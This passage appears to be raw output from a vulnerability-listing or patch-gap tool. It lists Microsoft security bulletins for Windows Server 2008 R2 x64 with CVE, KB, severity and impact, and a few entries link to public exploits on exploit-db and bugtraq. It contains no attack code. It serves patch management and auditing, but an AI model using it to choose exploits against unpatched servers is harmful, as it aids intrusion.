n/a, Date: 20100810CVE: CVE-2010-2554KB: KB982799Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110614CVE: CVE-2011-1868KB: KB2535512Title: Vulnerabilities in Distributed File System Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110208CVE: CVE-2011-0091KB: KB2425227Title: Vulnerabilities in Kerberos Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121211CVE: CVE-2012-2549KB: KB2765809Title: Vulnerability in IP-HTTPS Component Could Allow Security Feature BypassAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Security Feature BypassExploit: n/a, Date: 20110208CVE: CVE-2011-0031KB: KB2475792Title: Vulnerability in JScript and VBScript Scripting Engines Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: JScript 5.8Severity: ImportantImpact: Information DisclosureExploit: n/a, Date: 20110208CVE: CVE-2011-0031KB: KB2475792Title: Vulnerability in JScript and VBScript Scripting Engines Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: VBScript 5.8Severity: ImportantImpact: Information DisclosureExploit: n/a, Date: 20130409CVE: CVE-2013-2014KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 9Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-2014KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 8Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-1292KB: KB2840149Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1292KB: KB2808735Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1291KB: KB2840149Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1291KB: KB2808735Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1296KB: KB2813347Title: Vulnerability in Remote Desktop Client Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Remote Desktop Connection 7.0 ClientSeverity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-2013KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 9Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-2013KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 8Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-2730KB: KB2124261Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-2730KB: KB2271195Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120612CVE: CVE-2012-0173KB: KB2685939Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0176KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0176KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0176KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120710CVE: CVE-2012-0175KB: KB2691442Title: Vulnerability in Windows Shell Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120612CVE: CVE-2012-1515KB: KB2709715Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121211CVE: CVE-2012-4774KB: KB2758857Title: Vulnerability in Windows File Handling Component Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121113CVE: CVE-2012-4776KB: KB2729451Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121113CVE: CVE-2012-4777KB: KB2729451Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100713CVE: CVE-2009-3678KB: KB2032276Title: Vulnerability in Canonical Display Driver Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121009CVE: CVE-2012-2551KB: KB2743555Title: Vulnerability in Kerberos Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20121211CVE: CVE-2012-2556KB: KB2753842Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20081111CVE: CVE-2008-4029KB: KB954430Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110209CVE: SPSRV8R2X64SP1KB: KBSPSRV8R2X64SP1Title: Windows Server 2008 R2 for x64-based Systems Service Pack 1Affected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: No more updatesExploit: n/a, Date: 20120508CVE: CVE-2012-1848KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-1848KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-1848KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100511CVE: CVE-2010-0816KB: KB978542Title: Vulnerability in Outlook Express and Windows Mail Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Live Mail 2011Severity: CriticalImpact: Remote Code ExecutionExploits: http://archives.neohapsis.com/archives/bugtraq/2010-05/0068.html, http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=13&Itemid=13, http://www.securityfocus.com/bid/40052, Date: 20130212CVE: CVE-2013-0073KB: KB2789644Title: Vulnerability in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130212CVE: CVE-2013-0075KB: KB2790655Title: Vulnerability in TCP/IP Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130212CVE: CVE-2013-0076KB: KB2790113Title: Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20120214CVE: CVE-2012-0148KB: KB2645640Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20101012CVE: CVE-2010-1263KB: KB979687Title: Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: WordPadSeverity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-1263KB: KB979688Title: Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows ShellSeverity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-2745KB: KB2378111Title: Vulnerability in Windows Media Player Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Media Player 12Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-2746KB: KB2296011Title: Vulnerability in Windows Common Control Library Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20101214CVE: CVE-2010-2742KB: KB2207559Title: Vulnerability in Windows Netlogon Service Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20100209CVE: CVE-2010-0026KB: KB977894Title: Vulnerability in Windows Server 2008 Hyper-V Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20100413CVE: CVE-2010-0024KB: KB976323Title: Vulnerabilities in Microsoft Exchange and Windows SMTP Service Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20100413CVE: CVE-2010-0025KB: KB976323Title: Vulnerabilities in Microsoft Exchange and Windows SMTP Service Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20120814CVE: CVE-2012-1852KB: KB2712808Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1852KB: KB2705219Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1853KB: KB2712808Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1853KB: KB2705219Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1850KB: KB2712808Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1850KB: KB2705219Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1851KB: KB2712808Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1851KB: KB2705219Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-3223KB: KB2294255Title: Vulnerability in Windows Shared Cluster Disks Could Allow TamperingAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ModerateImpact: TamperingExploit: n/a, Date: 20101012CVE: CVE-2010-3227KB: KB2387149Title: Vulnerability in Microsoft Foundation Classes Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ModerateImpact: Remote Code ExecutionExploit: http://www.exploit-db.com/exploits/13921/, Date: 20120214CVE: CVE-2012-0150KB: KB2654428Title: Vulnerability in C Run-Time Library Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120412CVE: CVE-2012-0151KB: KB2653956Title: Vulnerability in Windows Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120313CVE: CVE-2012-0152KB: KB2667402Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120313CVE: CVE-2012-0152KB: KB2621440Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0159KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0159KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0159KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120110CVE: CVE-2012-0013KB: KB2584146Title: Vulnerability in Microsoft Windows Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0008KB: KB2778930Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: http://www.exploit-db.com/exploits/24485, Date: 20130108CVE: CVE-2013-0005KB: KB2736418Title: Vulnerability in Open Data Protocol Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130108CVE: CVE-2013-0004KB: KB2742598Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0004KB: KB2756920Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0007KB: KB2758694Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0007KB: KB2757638Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 3.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0007KB: KB2757638Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 6.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0006KB: KB2758694Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0006KB: KB2757638Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 3.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0006KB: KB2757638Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 6.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0001KB: KB2742598Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0001KB: KB2756920Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121211CVE: CVE-2012-4786KB: KB2753842Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0002KB: KB2742598Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0002KB: KB2756920Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20100810CVE: CVE-2010-2555KB: KB982799Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20100112CVE: CVE-2010-0018KB: KB972270Title: Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20111011CVE: CVE-2011-1247KB: KB2564958Title: Vulnerability in Microsoft Active Accessibility Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-1284KB: KB2813170Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130312CVE: CVE-2013-1285KB: KB2807986Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130312CVE: CVE-2013-1286KB: KB2807986Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130312CVE: CVE-2013-1287KB: KB2807986Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130212CVE: CVE-2013-1281KB: KB2790978Title: Vulnerability in NFS Server Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1282KB: KB2772930Title: Vulnerability in Active Directory Could Lead to Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Active Directory ServicesSeverity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1282KB: KB2772930Title: Vulnerability in Active Directory Could Lead to Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Active Directory Lightweight Directory ServicesSeverity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1283KB: KB2840149Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1283KB: KB2808735Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110208CVE: CVE-2011-0043KB: KB2425227Title: Vulnerabilities in Kerberos Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110308CVE: CVE-2011-0042KB: KB2479943Title: Vulnerabilities in Windows Media Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110208CVE: CVE-2011-0045KB: KB2393802Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20120313CVE: CVE-2012-0002KB: KB2667402Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120313CVE: CVE-2012-0002KB: KB2621440Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120110CVE: CVE-2012-0003KB: KB2631813Title: Vulnerabilities in Windows Media Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: DirectShowSeverity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120110CVE: CVE-2012-0001KB: KB2644615Title: Vulnerability in Windows Kernel Could Allow Security Feature BypassAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Security Feature BypassExploit: n/a, Date: 20120313CVE: CVE-2012-0006KB: KB2647170Title: Vulnerability in DNS Server Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20120214CVE: CVE-2010-5082KB: KB2643719Title: Vulnerability in Color Control Panel Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120110CVE: CVE-2012-0004KB: KB2631813Title: Vulnerabilities in Windows Media Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: DirectShowSeverity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-1883KB: KB982132Title: Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100608CVE: CVE-2010-1880KB: KB979482Title: Vulnerabilities in Media Decompression Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Asycfilt.dll (COM component)Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100608CVE: CVE-2010-1256KB: KB982666Title: Vulnerability in Internet Information Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0013KB: KB2785220Title: Vulnerability in Microsoft Windows Could Allow Security Feature BypassAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Security Feature BypassExploit: n/a, Date: 20100413CVE: CVE-2010-0486KB: KB979309Title: Vulnerabilities in Windows Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Cabinet File Viewer Shell Extension 6.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0011KB: KB2769369Title: Vulnerability in Windows Print Spooler Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120710CVE: CVE-2012-1870KB: KB2655992Title: Vulnerability in TLS Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Information DisclosureExploit: n/a, Date: 20101214CVE: CVE-2010-3961KB: KB2442962Title: Vulnerability in Consent User Interface Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20100209CVE: CVE-2010-0250KB: KB975560Title: Vulnerability in Microsoft DirectShow Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft DirectXSeverity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101214CVE: CVE-2010-3966KB: KB2385678Title: Vulnerability in Microsoft Windows Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-2731KB: KB2124261Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-2731KB: KB2271195Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20100413CVE: CVE-2010-0487KB: KB979309Title: Vulnerabilities in Windows Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Cabinet File Viewer Shell Extension 6.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120710CVE: 